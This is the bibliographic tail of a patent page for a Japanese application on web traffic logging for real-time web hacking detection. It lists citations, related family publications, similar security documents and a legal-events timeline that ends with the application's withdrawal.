Publication number Priority date Publication date Assignee Title
CA2814261C (en) * 2004-04-15 2015-09-15 Clearpath Networks, Inc. Systems and methods for managing a network
CN101459503A (zh) * 2007-12-12 2009-06-17 华为技术有限公司 一种实现数据同步的方法和装置
KR101005866B1 (ko) * 2008-09-03 2011-01-05 충남대학교산학협력단 룰기반 웹아이디에스 시스템용 웹로그 전처리방법 및 시스템
US9106680B2 (en) * 2011-06-27 2015-08-11 Mcafee, Inc. System and method for protocol fingerprinting and reputation correlation
WO2014119669A1 (ja) * 2013-01-30 2014-08-07 日本電信電話株式会社 ログ分析装置、情報処理方法及びプログラム
KR101417671B1 (ko) 2013-08-16 2014-07-09 (주)유틸리온 센서 네트워크상의 보안관리 및 공격탐지 시스템
CN104468477B (zh) * 2013-09-16 2018-04-06 杭州迪普科技股份有限公司 一种WebShell的检测方法及系统
CN105933268B (zh) * 2015-11-27 2019-05-10 中国银联股份有限公司 一种基于全量访问日志分析的网站后门检测方法及装置
CN105357584B (zh) * 2015-12-11 2020-09-22 Tcl科技集团股份有限公司 一种基于智能电视的用户行为日志分类上传方法及系统

Patent Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2006304108A (ja) * 2005-04-22 2006-11-02 Ntt Communications Kk ログ集計支援装置、ログ集計支援システム、ログ集計支援プログラム、およびログ集計支援方法
JP2008117267A (ja) * 2006-11-07 2008-05-22 Yafoo Japan Corp 閲覧履歴提供システム、閲覧履歴提供装置、閲覧履歴提供方法、および閲覧履歴提供プログラム
JP2013137740A (ja) * 2011-11-28 2013-07-11 Internatl Business Mach Corp <Ibm> 機密情報識別方法、情報処理装置、およびプログラム
US20140344622A1 (en) * 2013-05-20 2014-11-20 Vmware, Inc. Scalable Log Analytics
US20150281007A1 (en) * 2014-03-28 2015-10-01 Fortinet, Inc. Network flow analysis
JP2016114985A (ja) * 2014-12-11 2016-06-23 Tis株式会社 ログ解析方法、ログ解析プログラム及びログ解析装置
JP2017097858A (ja) * 2015-11-20 2017-06-01 インターナショナル・ビジネス・マシーンズ・コーポレーションInternational Business Machines Corporation クラウド環境における保証されたログ管理のためのアプリケーション・セルフサービス

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
"セキュリティセミナー REVIEW 〜情報システムに今求められるセキュリティ対策とは〜", 日経NETWORK, vol. 第166号, JPN6019044674, 28 January 2014 (2014-01-28), JP, pages 26, ISSN: 0004156668 *

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2022219806A1 (ja) * 2021-04-16 2022-10-20 日本電信電話株式会社 判定装置、判定方法、および、判定プログラム

Also Published As

Publication number Publication date
CN109845228A (zh) 2019-06-04
EP3691217A1 (en) 2020-08-05
EP3691217A4 (en) 2021-05-12
WO2019066295A1 (ko) 2019-04-04
CN109845228B (zh) 2021-08-31
EP3691217B1 (en) 2023-08-23
US11140181B2 (en) 2021-10-05
US20210226967A1 (en) 2021-07-22

Similar Documents

Publication Publication Date Title
JP2019533841A (ja) ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法
Salas et al. Security testing methodology for vulnerabilities detection of xss in web services and ws-security
CA2966408C (en) A system and method for network intrusion detection of covert channels based on off-line network traffic
Caballero et al. Automatic protocol reverse-engineering: Message format extraction and field semantics inference
Johari et al. A survey on web application vulnerabilities (SQLIA, XSS) exploitation and security engine for SQL injection
Bortolameotti et al. Decanter: Detection of anomalous outbound http traffic by passive application fingerprinting
KR101909957B1 (ko) 실시간 웹 해킹 탐지를 위한 웹 트래픽 로깅 시스템 및 방법
Wang et al. Discovering vulnerabilities in COTS IoT devices through blackbox fuzzing web management interface
Atapour et al. Modeling Advanced Persistent Threats to enhance anomaly detection techniques
Sharif Web attacks analysis and mitigation techniques
KR101896267B1 (ko) 실시간 로그 분석 기반의 공격 탐지 시스템 및 방법
Ezeife et al. SensorWebIDS: a web mining intrusion detection system
Maggi et al. Is the future Web more insecure? Distractions and solutions of new-old security issues and measures
US11228607B2 (en) Graceful termination of security-violation client connections in a network protection system (NPS)
Schulte et al. Netgator: Malware detection using program interactive challenges
Fry A forensic web log analysis tool: Techniques and implementation
Maggi et al. Rethinking security in a cloudy world
Ussath et al. Insights into Encrypted Network Connections: Analyzing Remote Desktop Protocol Traffic
AR Identifying SOA security threats using web mining
Xiong et al. Web and Database Security
Taylor Software-defined Networking: Improving Security for Enterprise and Home Networks
Karchev IOT device profiling for Honeypot generation
Torbjørnsen A study of applied passive TLS analysis
Lin et al. Using a specification-based intrusion detection system to extend the DNP3 protocol with security functionalities
Magnusson Monitoring malicious PowerShell usage through log analysis

Legal Events

Date Code Title Description
A621 Written request for application examination

Free format text: JAPANESE INTERMEDIATE CODE: A621

Effective date: 20180914

A131 Notification of reasons for refusal

Free format text: JAPANESE INTERMEDIATE CODE: A131

Effective date: 20191119

A601 Written request for extension of time

Free format text: JAPANESE INTERMEDIATE CODE: A601

Effective date: 20200205

A601 Written request for extension of time

Free format text: JAPANESE INTERMEDIATE CODE: A601

Effective date: 20200417

A761 Written withdrawal of application

Free format text: JAPANESE INTERMEDIATE CODE: A761

Effective date: 20200601

A521 Request for written amendment filed

Free format text: JAPANESE INTERMEDIATE CODE: A821

Effective date: 20200601